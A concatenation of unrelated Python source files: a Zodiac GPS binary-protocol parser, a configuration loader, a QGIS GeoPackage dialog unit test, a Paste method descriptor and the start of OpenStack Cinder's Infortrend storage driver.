1102: 'meastimemark', # Measurement Time Mark
1108: 'utctimemark', # UTC Time Mark Pulse Output
1130: 'serial', # Serial Port Communication Parameters In Use
1135: 'eepromupdate', # EEPROM Update
1136: 'eepromstatus', # EEPROM Status
}
# these aren't used for anything yet, just sitting here for reference
messages = {
# Input Messages
'fix': 1200, # Geodesic Position and Velocity Initialization
'udatum': 1210, # User-Defined Datum Definition
'mdatum': 1211, # Map Datum Select
'smask': 1212, # Satellite Elevation Mask Control
'sselect': 1213, # Satellite Candidate Select
'dgpsc': 1214, # Differential GPS Control
'startc': 1216, # Cold Start Control
'svalid': 1217, # Solution Validity Control
'antenna': 1218, # Antenna Type Select
'altinput': 1219, # User-Entered Altitude Input
'appctl': 1220, # Application Platform Control
'navcfg': 1221, # Nav Configuration
'test': 1300, # Perform Built-In Test Command
'restart': 1303, # Restart Command
'serial': 1330, # Serial Port Communications Parameters
'msgctl': 1331, # Message Protocol Control
'dgpsd': 1351, # Raw DGPS RTCM SC-104 Data
}
MAX_LENGTH = 296
allow_earthmate_hack = 1
recvd = ""
def dataReceived(self, recd):
self.recvd = self.recvd + recd
while len(self.recvd) >= 10:
# hack for DeLorme EarthMate
if self.recvd[:8] == 'EARTHA\r\n':
if self.allow_earthmate_hack:
self.allow_earthmate_hack = 0
self.transport.write('EARTHA\r\n')
self.recvd = self.recvd[8:]
continue
if self.recvd[0:2] != '\xFF\x81':
if DEBUG:
raise ZodiacParseError('Invalid Sync %r' % self.recvd)
else:
raise ZodiacParseError
sync, msg_id, length, acknak, checksum = struct.unpack('<HHHHh', self.recvd[:10])
# verify checksum
cksum = -(reduce(operator.add, (sync, msg_id, length, acknak)) & 0xFFFF)
cksum, = struct.unpack('<h', struct.pack('<h', cksum))
if cksum != checksum:
if DEBUG:
raise ZodiacParseError('Invalid Header Checksum %r != %r %r' % (checksum, cksum, self.recvd[:8]))
else:
raise ZodiacParseError
# length was in words, now it's bytes
length = length * 2
# do we need more data ?
neededBytes = 10
if length:
neededBytes += length + 2
if len(self.recvd) < neededBytes:
break
if neededBytes > self.MAX_LENGTH:
raise ZodiacParseError("Invalid Header??")
# empty messages pass empty strings
message = ''
# does this message have data ?
if length:
message, checksum = self.recvd[10:10+length], struct.unpack('<h', self.recvd[10+length:neededBytes])[0]
cksum = 0x10000 - (reduce(operator.add, struct.unpack('<%dH' % (length/2), message)) & 0xFFFF)
cksum, = struct.unpack('<h', struct.pack('<h', cksum))
if cksum != checksum:
if DEBUG:
log.debug('msg_id = %r length = %r' % (msg_id, length))
raise ZodiacParseError('Invalid Data Checksum %r != %r %r' % (checksum, cksum, message))
else:
raise ZodiacParseError
# discard used buffer, dispatch message
self.recvd = self.recvd[neededBytes:]
self.receivedMessage(msg_id, message, acknak)
def receivedMessage(self, msg_id, message, acknak):
dispatch = self.dispatch.get(msg_id, None)
if not dispatch:
raise ZodiacParseError('Unknown msg_id = %r' % msg_id)
handler = getattr(self, 'handle_%s' % dispatch, None)
decoder = getattr(self, 'decode_%s' % dispatch, None)
if not (handler and decoder):
# missing handler or decoder
#if DEBUG:
# log.debug('MISSING HANDLER/DECODER PAIR FOR: %r' % (dispatch,))
return
decoded = decoder(message)
return handler(*decoded)
def decode_fix(self, message):
assert len(message) == 98, "Geodesic Position Status Output should be 55 words total (98 byte message)"
(ticks, msgseq, satseq, navstatus, navtype, nmeasure, polar, gpswk, gpses, gpsns, utcdy, utcmo, utcyr, utchr, utcmn, utcsc, utcns, latitude, longitude, height, geoidalsep, speed, course, magvar, climb, mapdatum, exhposerr, exvposerr, extimeerr, exphvelerr, clkbias, clkbiasdev, clkdrift, clkdriftdev) = struct.unpack('<LhhHHHHHLLHHHHHHLlllhLHhhHLLLHllll', message)
# there's a lot of shit in here..
# I'll just snag the important stuff and spit it out like my NMEA decoder
utc = (utchr * 3600.0) + (utcmn * 60.0) + utcsc + (float(utcns) * 0.000000001)
log.debug('utchr, utcmn, utcsc, utcns = ' + repr((utchr, utcmn, utcsc, utcns)))
latitude = float(latitude) * 0.00000180 / math.pi
longitude = float(longitude) * 0.00000180 / math.pi
posfix = not (navstatus & 0x001c)
satellites = nmeasure
hdop = float(exhposerr) * 0.01
altitude = float(height) * 0.01, 'M'
geoid = float(geoidalsep) * 0.01, 'M'
dgps = None
return (
# seconds since 00:00 UTC
utc,
# latitude (degrees)
latitude,
# longitude (degrees)
longitude,
# position fix status (invalid = False, valid = True)
posfix,
# number of satellites [measurements] used for fix 0 <= satellites <= 12
satellites,
# horizontal dilution of precision
hdop,
# (altitude according to WGS-84 ellipsoid, units (always 'M' for meters))
altitude,
# (geoid separation according to WGS-84 ellipsoid, units (always 'M' for meters))
geoid,
# None, for compatability w/ NMEA code
dgps,
)
def decode_id(self, message):
assert len(message) == 106, "Receiver ID Message should be 59 words total (106 byte message)"
ticks, msgseq, channels, software_version, software_date, options_list, reserved = struct.unpack('<Lh20s20s20s20s20s', message)
channels, software_version, software_date, options_list = map(lambda s: s.split('\0')[0], (channels, software_version, software_date, options_list))
software_version = float(software_version)
channels = int(channels) # 0-12 .. but ALWAYS 12, so we ignore.
options_list = int(options_list[:4], 16) # only two bitflags, others are reserved
minimize_rom = (options_list & 0x01) > 0
minimize_ram = (options_list & 0x02) > 0
# (version info), (options info)
return ((software_version, software_date), (minimize_rom, minimize_ram))
def decode_channels(self, message):
assert len(message) == 90, "Channel Summary Message should be 51 words total (90 byte message)"
ticks, msgseq, satseq, gpswk, gpsws, gpsns = struct.unpack('<LhhHLL', message[:18])
channels = []
message = message[18:]
for i in range(12):
flags, prn, cno = struct.unpack('<HHH', message[6 * i:6 * (i + 1)])
# measurement used, ephemeris available, measurement valid, dgps corrections available
flags = (flags & 0x01, flags & 0x02, flags & 0x04, flags & 0x08)
channels.append((flags, prn, cno))
# ((flags, satellite PRN, C/No in dbHz)) for 12 channels
# satellite message sequence number
# gps week number, gps seconds in week (??), gps nanoseconds from Epoch
return (tuple(channels),) #, satseq, (gpswk, gpsws, gpsns))
def decode_satellites(self, message):
assert len(message) == 90, "Visible Satellites Message should be 51 words total (90 byte message)"
ticks, msgseq, gdop, pdop, hdop, vdop, tdop, numsatellites = struct.unpack('<LhhhhhhH', message[:18])
gdop, pdop, hdop, vdop, tdop = map(lambda n: float(n) * 0.01, (gdop, pdop, hdop, vdop, tdop))
satellites = []
message = message[18:]
for i in range(numsatellites):
prn, azi, elev = struct.unpack('<Hhh', message[6 * i:6 * (i + 1)])
azi, elev = map(lambda n: (float(n) * 0.0180 / math.pi), (azi, elev))
satellites.push((prn, azi, elev))
# ((PRN [0, 32], azimuth +=[0.0, 180.0] deg, elevation +-[0.0, 90.0] deg)) satellite info (0-12)
# (geometric, position, horizontal, vertical, time) dilution of precision
return (tuple(satellites), (gdop, pdop, hdop, vdop, tdop))
def decode_dgps(self, message):
assert len(message) == 38, "Differential GPS Status Message should be 25 words total (38 byte message)"
raise NotImplementedError
def decode_ecef(self, message):
assert len(message) == 96, "ECEF Position Status Output Message should be 54 words total (96 byte message)"
raise NotImplementedError
def decode_channelmeas(self, message):
assert len(message) == 296, "Channel Measurement Message should be 154 words total (296 byte message)"
raise NotImplementedError
def decode_usersettings(self, message):
assert len(message) == 32, "User-Settings Output Message should be 22 words total (32 byte message)"
raise NotImplementedError
def decode_testresults(self, message):
assert len(message) == 28, "Built-In Test Results Message should be 20 words total (28 byte message)"
raise NotImplementedError
def decode_meastimemark(self, message):
assert len(message) == 494, "Measurement Time Mark Message should be 253 words total (494 byte message)"
raise NotImplementedError
def decode_utctimemark(self, message):
assert len(message) == 28, "UTC Time Mark Pulse Output Message should be 20 words total (28 byte message)"
raise NotImplementedError
def decode_serial(self, message):
assert len(message) == 30, "Serial Port Communication Paramaters In Use Message should be 21 words total (30 byte message)"
raise NotImplementedError
def decode_eepromupdate(self, message):
assert len(message) == 8, "EEPROM Update Message should be 10 words total (8 byte message)"
raise NotImplementedError
def decode_eepromstatus(self, message):
assert len(message) == 24, "EEPROM Status Message should be 18 words total (24 byte message)"
raise NotImplementedError
|
karanisverma/feature_langpop
|
refs/heads/master
|
librarian/lib/confloader.py
|
2
|
"""
confloader.py: Application configuration loader
Copyright 2014-2015, Outernet Inc.
Some rights reserved.
This software is free software licensed under the terms of GPLv3. See COPYING
file that comes with the source code, or http://www.gnu.org/licenses/gpl.txt.
"""
import os
import re
try:
from configparser import RawConfigParser as ConfigParser
except ImportError:
from ConfigParser import RawConfigParser as ConfigParser
FLOAT_RE = re.compile(r'^\d+\.\d+$')
INT_RE = re.compile(r'^\d+$')
SIZE_RE = re.compile(r'^\d+(\.\d{1,3})? ?[KMG]B$', re.I)
FACTORS = {
'b': 1,
'k': 1024,
'm': 1024 * 1024,
'g': 1024 * 1024 * 1024,
}
def parse_size(size):
""" Parses size with B, K, M, or G suffix and returns in size bytes
:param size: human-readable size with suffix
:returns: size in bytes or 0 if source string is using invalid
notation
"""
size = size.lower()[:-1]
if size[-1] not in 'bkmg':
suffix = 'b'
else:
suffix = size[-1]
size = size[:-1]
try:
size = float(size)
except ValueError:
return 0
return size * FACTORS[suffix]
class ConfigurationError(Exception):
""" Raised when application is not configured correctly """
pass
class ConfigurationFormatError(ConfigurationError):
""" Raised when configuration file is malformed """
def __init__(self, keyerr):
key = keyerr.args[0]
if '.' in key:
self.section, self.subsection = key.split('.')
else:
self.section = 'GLOBAL'
self.subsection = key
super(ConfigurationFormatError, self).__init__(
"Configuration error in section [{}]: missing '{}' setting".format(
self.section, self.subsection))
class ConfDict(dict):
def __getitem__(self, key):
try:
return super(ConfDict, self).__getitem__(key)
except KeyError as err:
raise ConfigurationFormatError(err)
@classmethod
def from_file(cls, path, skip_clean=False, base_dir='.', **defaults):
path = os.path.normpath(os.path.join(base_dir, path))
self = cls()
self.update(defaults)
parser = ConfigParser()
parser.read(path)
sections = parser.sections()
if not sections:
raise ConfigurationError(
"Missing or empty configuration file at '{}'".format(path))
children = []
defaults = []
for section in sections:
for key, value in parser.items(section):
if section not in ('DEFAULT', 'bottle'):
compound_key = '{}.{}'.format(section, key)
else:
compound_key = key
if not skip_clean:
value = self.clean_value(value)
if section == 'config' and key == 'defaults':
defaults = value
elif section == 'config' and key == 'include':
children = value
else:
self[compound_key] = value
incl_basedir = os.path.dirname(path)
for default in defaults:
self.setdefaults(cls.from_file(default, skip_clean=skip_clean,
base_dir=incl_basedir))
for child in children:
self.update(cls.from_file(child, skip_clean=skip_clean,
base_dir=incl_basedir))
return self
def setdefaults(self, other):
for k in other:
if k in self:
continue
self[k] = other[k]
@staticmethod
def clean_value(val):
""" Perform coercing of the values """
# True values: 'yes', 'Yes', 'true', 'True'
if val.lower() in ('yes', 'true'):
return True
# False values: 'no', 'No', 'false', 'False'
if val.lower() in ('no', 'false'):
return False
# Null values: 'null', 'NULL', 'none', 'None'
if val.lower() in ('null', 'none'):
return None
# Floating point numbers: 1.0, 12.443, 1002.3
if FLOAT_RE.match(val):
return float(val)
# Integer values: 1, 30, 445
if INT_RE.match(val):
return int(val)
# Data sizes: 10B, 12.3MB, 5.6 GB
if SIZE_RE.match(val):
return parse_size(val)
# Lists: one item per line, indented
if val.startswith('\n'):
return val[1:].split('\n')
# Multi-line string: same as python with triple-doublequotes
if val.startswith('"""'):
return val.strip('"""').strip()
# Everything else is returned as is
return val
|
sbrunner/QGIS
|
refs/heads/master
|
tests/src/python/test_qgsnewgeopackagelayerdialog.py
|
19
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsNewGeoPackageLayerDialog
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Even Rouault'
__date__ = '2016-04-21'
__copyright__ = 'Copyright 2016, Even Rouault'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
import tempfile
import shutil
from qgis.PyQt.QtCore import QCoreApplication, Qt
from qgis.PyQt.QtWidgets import QLineEdit, QDialogButtonBox, QTreeWidget, QComboBox, QToolButton
from qgis.PyQt.QtTest import QTest
from qgis.core import QgsProject, QgsSettings, QgsWkbTypes
from qgis.gui import QgsNewGeoPackageLayerDialog, QgsFileWidget
from qgis.testing import start_app, unittest
def GDAL_COMPUTE_VERSION(maj, min, rev):
return ((maj) * 1000000 + (min) * 10000 + (rev) * 100)
class TestPyQgsNewGeoPackageLayerDialog(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
QCoreApplication.setOrganizationName("QGIS_Test")
QCoreApplication.setOrganizationDomain("QGIS_TestPyQgsNewGeoPackageLayerDialog.com")
QCoreApplication.setApplicationName("QGIS_TestPyQgsNewGeoPackageLayerDialog")
QgsSettings().clear()
start_app()
cls.basetestpath = tempfile.mkdtemp()
@classmethod
def tearDownClass(cls):
"""Run after all tests"""
QgsSettings().clear()
if cls.basetestpath is not None:
shutil.rmtree(cls.basetestpath, True)
def test(self):
# Skip if GDAL python bindings are not available
try:
from osgeo import gdal, ogr
except:
return
version_num = int(gdal.VersionInfo('VERSION_NUM'))
if version_num < GDAL_COMPUTE_VERSION(1, 11, 0):
return
dialog = QgsNewGeoPackageLayerDialog()
dialog.setProperty("hideDialogs", True)
mDatabase = dialog.findChild(QgsFileWidget, "mDatabase")
buttonBox = dialog.findChild(QDialogButtonBox, "buttonBox")
ok_button = buttonBox.button(QDialogButtonBox.Ok)
mTableNameEdit = dialog.findChild(QLineEdit, "mTableNameEdit")
mLayerIdentifierEdit = dialog.findChild(QLineEdit, "mLayerIdentifierEdit")
mLayerDescriptionEdit = dialog.findChild(QLineEdit, "mLayerDescriptionEdit")
mFeatureIdColumnEdit = dialog.findChild(QLineEdit, "mFeatureIdColumnEdit")
mGeometryTypeBox = dialog.findChild(QComboBox, "mGeometryTypeBox")
mGeometryColumnEdit = dialog.findChild(QLineEdit, "mGeometryColumnEdit")
mFieldNameEdit = dialog.findChild(QLineEdit, "mFieldNameEdit")
mFieldTypeBox = dialog.findChild(QComboBox, "mFieldTypeBox")
mFieldLengthEdit = dialog.findChild(QLineEdit, "mFieldLengthEdit")
mAddAttributeButton = dialog.findChild(QToolButton, "mAddAttributeButton")
mRemoveAttributeButton = dialog.findChild(QToolButton, "mRemoveAttributeButton")
mAttributeView = dialog.findChild(QTreeWidget, "mAttributeView")
dialog.accepted.connect(self.accepted_slot)
mGeometryTypeBox.setCurrentIndex(mGeometryTypeBox.findData(ogr.wkbPoint))
self.assertEqual(mGeometryTypeBox.currentText(), "Point")
self.assertFalse(ok_button.isEnabled())
dbname = os.path.join(self.basetestpath, 'test.gpkg')
mDatabase.setFilePath(dbname)
self.assertEqual(mTableNameEdit.text(), 'test')
self.assertEqual(mLayerIdentifierEdit.text(), 'test')
self.assertTrue(ok_button.isEnabled())
mGeometryColumnEdit.setText('my_geom')
mFeatureIdColumnEdit.setText('my_fid')
self.assertFalse(mAddAttributeButton.isEnabled())
self.assertFalse(mRemoveAttributeButton.isEnabled())
mFieldNameEdit.setText('strfield')
self.assertTrue(mAddAttributeButton.isEnabled())
mFieldLengthEdit.setText('10')
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
mFieldNameEdit.setText('intfield')
mFieldTypeBox.setCurrentIndex(mFieldTypeBox.findData('integer'))
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
mFieldNameEdit.setText('realfield')
mFieldTypeBox.setCurrentIndex(mFieldTypeBox.findData('real'))
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
mFieldNameEdit.setText('datefield')
mFieldTypeBox.setCurrentIndex(mFieldTypeBox.findData('date'))
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
mFieldNameEdit.setText('datetimefield')
mFieldTypeBox.setCurrentIndex(mFieldTypeBox.findData('datetime'))
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
mFieldNameEdit.setText('int64field')
mFieldTypeBox.setCurrentIndex(mFieldTypeBox.findData('integer64'))
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
# Add and remove field
mFieldNameEdit.setText('dummy')
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
index = mAttributeView.model().index(mAttributeView.model().rowCount() - 1, 0)
mAttributeView.setCurrentIndex(index)
QTest.mouseClick(mRemoveAttributeButton, Qt.LeftButton)
self.accepted = False
QTest.mouseClick(ok_button, Qt.LeftButton)
self.assertTrue(self.accepted)
layers = QgsProject.instance().mapLayers()
self.assertEqual(len(layers), 1)
layer = layers[list(layers.keys())[0]]
self.assertEqual(layer.name(), 'test')
self.assertEqual(layer.geometryType(), QgsWkbTypes.PointGeometry)
QgsProject.instance().removeAllMapLayers()
ds = ogr.Open(dbname)
lyr = ds.GetLayer(0)
self.assertEqual(lyr.GetFIDColumn(), 'my_fid')
self.assertEqual(lyr.GetGeometryColumn(), 'my_geom')
self.assertEqual(lyr.GetGeomType(), ogr.wkbPoint)
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
self.assertEqual(lyr.GetLayerDefn().GetFieldCount(), 6)
else:
self.assertEqual(lyr.GetLayerDefn().GetFieldCount(), 5)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(0).GetNameRef(), 'strfield')
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(0).GetType(), ogr.OFTString)
# Only GDAL 2.0 recognizes string field width
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(0).GetWidth(), 10)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(1).GetNameRef(), 'intfield')
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(1).GetType(), ogr.OFTInteger)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(1).GetWidth(), 0)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(2).GetNameRef(), 'realfield')
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(2).GetType(), ogr.OFTReal)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(2).GetWidth(), 0)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(3).GetNameRef(), 'datefield')
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(3).GetType(), ogr.OFTDate)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(3).GetWidth(), 0)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(4).GetNameRef(), 'datetimefield')
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(4).GetType(), ogr.OFTDateTime)
else:
# There's a bug in OGR 1.11. The field is probably declared as DATETIME in SQL
# but OGR detects it as OFTDate
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(4).GetType(), ogr.OFTDate)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(4).GetWidth(), 0)
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(5).GetNameRef(), 'int64field')
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(5).GetType(), ogr.OFTInteger64)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(5).GetWidth(), 0)
ds = None
# Try re-adding with different table. It should ask if we want to
# overwrite the DB, and we'll implicitly answer cancel, hence failure
mTableNameEdit.setText('table2')
self.accepted = False
QTest.mouseClick(ok_button, Qt.LeftButton)
self.assertFalse(self.accepted)
# Retry, and ask to keep the DB
self.accepted = False
dialog.setProperty('question_existing_db_answer_add_new_layer', True)
QTest.mouseClick(ok_button, Qt.LeftButton)
dialog.setProperty('question_existing_db_answer_add_new_layer', None)
self.assertTrue(self.accepted)
QgsProject.instance().removeAllMapLayers()
ds = ogr.Open(dbname)
self.assertEqual(ds.GetLayerCount(), 2)
ds = None
# Retry, and ask to overwrite the DB
self.accepted = False
dialog.setProperty('question_existing_db_answer_overwrite', True)
QTest.mouseClick(ok_button, Qt.LeftButton)
dialog.setProperty('question_existing_db_answer_overwrite', None)
self.assertTrue(self.accepted)
QgsProject.instance().removeAllMapLayers()
ds = ogr.Open(dbname)
self.assertEqual(ds.GetLayerCount(), 1)
ds = None
# Try re-adding with same parameters. It should ask if we want to
# overwrite the layer, and we'll implicitly answer no, hence failure
# since it already exists with that name
self.accepted = False
dialog.setProperty('question_existing_db_answer_add_new_layer', True)
QTest.mouseClick(ok_button, Qt.LeftButton)
dialog.setProperty('question_existing_db_answer_add_new_layer', None)
self.assertFalse(self.accepted)
# Now answer yes, and change a few things
mLayerIdentifierEdit.setText('my_identifier')
mLayerDescriptionEdit.setText('my_description')
dialog.setProperty('question_existing_db_answer_add_new_layer', True)
dialog.setProperty('question_existing_layer_answer_overwrite', True)
self.accepted = False
QTest.mouseClick(ok_button, Qt.LeftButton)
dialog.setProperty('question_existing_db_answer_add_new_layer', None)
dialog.setProperty('question_existing_layer_answer_overwrite', None)
self.assertTrue(self.accepted)
# Only check with OGR 2.0 since the IDENTIFIER and DESCRIPTION creation options don't exist in OGR 1.11
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
layers = QgsProject.instance().mapLayers()
self.assertEqual(len(layers), 1)
layer = layers[list(layers.keys())[0]]
self.assertEqual(layer.name(), 'my_identifier')
QgsProject.instance().removeAllMapLayers()
ds = ogr.Open(dbname)
sql_lyr = ds.ExecuteSQL('SELECT * FROM gpkg_contents')
self.assertEqual(sql_lyr.GetFeatureCount(), 1)
f = sql_lyr.GetNextFeature()
identifier = f.GetField('identifier')
description = f.GetField('description')
f = None
ds.ReleaseResultSet(sql_lyr)
ds = None
self.assertEqual(identifier, 'my_identifier')
self.assertEqual(description, 'my_description')
else:
QgsProject.instance().removeAllMapLayers()
# Try invalid path
mDatabase.setFilePath('/this/is/invalid/test.gpkg')
self.accepted = False
QTest.mouseClick(ok_button, Qt.LeftButton)
self.assertFalse(self.accepted)
# dialog.exec_()
def accepted_slot(self):
self.accepted = True
if __name__ == '__main__':
unittest.main()
|
adrianlee/rcon-cs
|
refs/heads/master
|
rconsoft/util/classinstance.py
|
62
|
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class classinstancemethod(object):
"""
Acts like a class method when called from a class, like an
instance method when called by an instance. The method should
take two arguments, 'self' and 'cls'; one of these will be None
depending on how the method was called.
"""
def __init__(self, func):
self.func = func
self.__doc__ = func.__doc__
def __get__(self, obj, type=None):
return _methodwrapper(self.func, obj=obj, type=type)
class _methodwrapper(object):
def __init__(self, func, obj, type):
self.func = func
self.obj = obj
self.type = type
def __call__(self, *args, **kw):
assert not kw.has_key('self') and not kw.has_key('cls'), (
"You cannot use 'self' or 'cls' arguments to a "
"classinstancemethod")
return self.func(*((self.obj, self.type) + args), **kw)
def __repr__(self):
if self.obj is None:
return ('<bound class method %s.%s>'
% (self.type.__name__, self.func.func_name))
else:
return ('<bound method %s.%s of %r>'
% (self.type.__name__, self.func.func_name, self.obj))
|
cloudbase/cinder
|
refs/heads/master
|
cinder/volume/drivers/infortrend/raidcmd_cli/common_cli.py
|
5
|
# Copyright (c) 2015 Infortrend Technology, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Infortrend Common CLI.
"""
import math
import time
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import timeutils
from oslo_utils import units
from cinder import exception
from cinder.i18n import _, _LE, _LI, _LW
from cinder.volume.drivers.infortrend.raidcmd_cli import cli_factory as cli
from cinder.volume.drivers.san import san
from cinder.volume import volume_types
from cinder.zonemanager import utils as fczm_utils
LOG = logging.getLogger(__name__)
infortrend_esds_opts = [
cfg.StrOpt('infortrend_pools_name',
default='',
help='Infortrend raid pool name list. '
'It is separated with comma.'),
cfg.StrOpt('infortrend_cli_path',
default='/opt/bin/Infortrend/raidcmd_ESDS10.jar',
help='The Infortrend CLI absolute path. '
'By default, it is at '
'/opt/bin/Infortrend/raidcmd_ESDS10.jar'),
cfg.IntOpt('infortrend_cli_max_retries',
default=5,
help='Maximum retry time for cli. Default is 5.'),
cfg.IntOpt('infortrend_cli_timeout',
default=30,
help='Default timeout for CLI copy operations in minutes. '
'Support: migrate volume, create cloned volume and '
'create volume from snapshot. '
'By Default, it is 30 minutes.'),
cfg.StrOpt('infortrend_slots_a_channels_id',
default='0,1,2,3,4,5,6,7',
help='Infortrend raid channel ID list on Slot A '
'for OpenStack usage. It is separated with comma. '
'By default, it is the channel 0~7.'),
cfg.StrOpt('infortrend_slots_b_channels_id',
default='0,1,2,3,4,5,6,7',
help='Infortrend raid channel ID list on Slot B '
'for OpenStack usage. It is separated with comma. '
'By default, it is the channel 0~7.'),
]
infortrend_esds_extra_opts = [
cfg.StrOpt('infortrend_provisioning',
default='full',
help='Let the volume use specific provisioning. '
'By default, it is the full provisioning. '
'The supported options are full or thin.'),
cfg.StrOpt('infortrend_tiering',
default='0',
help='Let the volume use specific tiering level. '
'By default, it is the level 0. '
'The supported levels are 0,2,3,4.'),
]
CONF = cfg.CONF
CONF.register_opts(infortrend_esds_opts)
CONF.register_opts(infortrend_esds_extra_opts)
CLI_RC_FILTER = {
'CreatePartition': {'error': _('Failed to create partition.')},
'DeletePartition': {'error': _('Failed to delete partition.')},
'SetPartition': {'error': _('Failed to set partition.')},
'CreateMap': {
'warning': {20: _LW('The MCS Channel is grouped.')},
'error': _('Failed to create map.'),
},
'DeleteMap': {
'warning': {11: _LW('No mapping.')},
'error': _('Failed to delete map.'),
},
'CreateSnapshot': {'error': _('Failed to create snapshot.')},
'DeleteSnapshot': {'error': _('Failed to delete snapshot.')},
'CreateReplica': {'error': _('Failed to create replica.')},
'DeleteReplica': {'error': _('Failed to delete replica.')},
'CreateIQN': {
'warning': {20: _LW('IQN already existed.')},
'error': _('Failed to create iqn.'),
},
'DeleteIQN': {
'warning': {
20: _LW('IQN has been used to create map.'),
11: _LW('No such host alias name.'),
},
'error': _('Failed to delete iqn.'),
},
'ShowLV': {'error': _('Failed to get lv info.')},
'ShowPartition': {'error': _('Failed to get partition info.')},
'ShowSnapshot': {'error': _('Failed to get snapshot info.')},
'ShowDevice': {'error': _('Failed to get device info.')},
'ShowChannel': {'error': _('Failed to get channel info.')},
'ShowMap': {'error': _('Failed to get map info.')},
'ShowNet': {'error': _('Failed to get network info.')},
'ShowLicense': {'error': _('Failed to get license info.')},
'ShowReplica': {'error': _('Failed to get replica info.')},
'ShowWWN': {'error': _('Failed to get wwn info.')},
'ShowIQN': {'error': _('Failed to get iqn info.')},
'ExecuteCommand': {'error': _('Failed to execute common command.')},
}
def log_func(func):
def inner(self, *args, **kwargs):
LOG.debug('Entering: %(method)s', {'method': func.__name__})
start = timeutils.utcnow()
ret = func(self, *args, **kwargs)
end = timeutils.utcnow()
LOG.debug(
'Leaving: %(method)s, '
'Spent: %(time)s sec, '
'Return: %(ret)s.', {
'method': func.__name__,
'time': timeutils.delta_seconds(start, end),
'ret': ret})
return ret
return inner
def mi_to_gi(mi_size):
return mi_size * units.Mi / units.Gi
def gi_to_mi(gi_size):
return gi_size * units.Gi / units.Mi
class InfortrendCommon(object):
"""The Infortrend's Common Command using CLI.
Version history:
1.0.0 - Initial driver
1.0.1 - Support DS4000
1.0.2 - Support GS Series
"""
VERSION = '1.0.2'
constants = {
'ISCSI_PORT': 3260,
'MAX_LUN_MAP_PER_CHL': 128
}
provisioning_values = ['thin', 'full']
tiering_values = ['0', '2', '3', '4']
def __init__(self, protocol, configuration=None):
self.protocol = protocol
self.configuration = configuration
self.configuration.append_config_values(san.san_opts)
self.configuration.append_config_values(infortrend_esds_opts)
self.configuration.append_config_values(infortrend_esds_extra_opts)
self.iscsi_multipath = self.configuration.use_multipath_for_image_xfer
self.path = self.configuration.infortrend_cli_path
self.password = self.configuration.san_password
self.ip = self.configuration.san_ip
self.cli_retry_time = self.configuration.infortrend_cli_max_retries
self.cli_timeout = self.configuration.infortrend_cli_timeout * 60
self.iqn = 'iqn.2002-10.com.infortrend:raid.uid%s.%s%s%s'
self.unmanaged_prefix = 'cinder-unmanaged-%s'
if self.ip == '':
msg = _('san_ip is not set.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
self.fc_lookup_service = fczm_utils.create_lookup_service()
self._volume_stats = None
self._model_type = 'R'
self._replica_timeout = self.cli_timeout
self.map_dict = {
'slot_a': {},
'slot_b': {},
}
self.map_dict_init = False
self.target_dict = {
'slot_a': {},
'slot_b': {},
}
if self.protocol == 'iSCSI':
self.mcs_dict = {
'slot_a': {},
'slot_b': {},
}
self._init_pool_list()
self._init_channel_list()
self.cli_conf = {
'path': self.path,
'password': self.password,
'ip': self.ip,
'cli_retry_time': int(self.cli_retry_time),
}
def _init_pool_list(self):
pools_name = self.configuration.infortrend_pools_name
if pools_name == '':
msg = _('Pools name is not set.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
tmp_pool_list = pools_name.split(',')
self.pool_list = [pool.strip() for pool in tmp_pool_list]
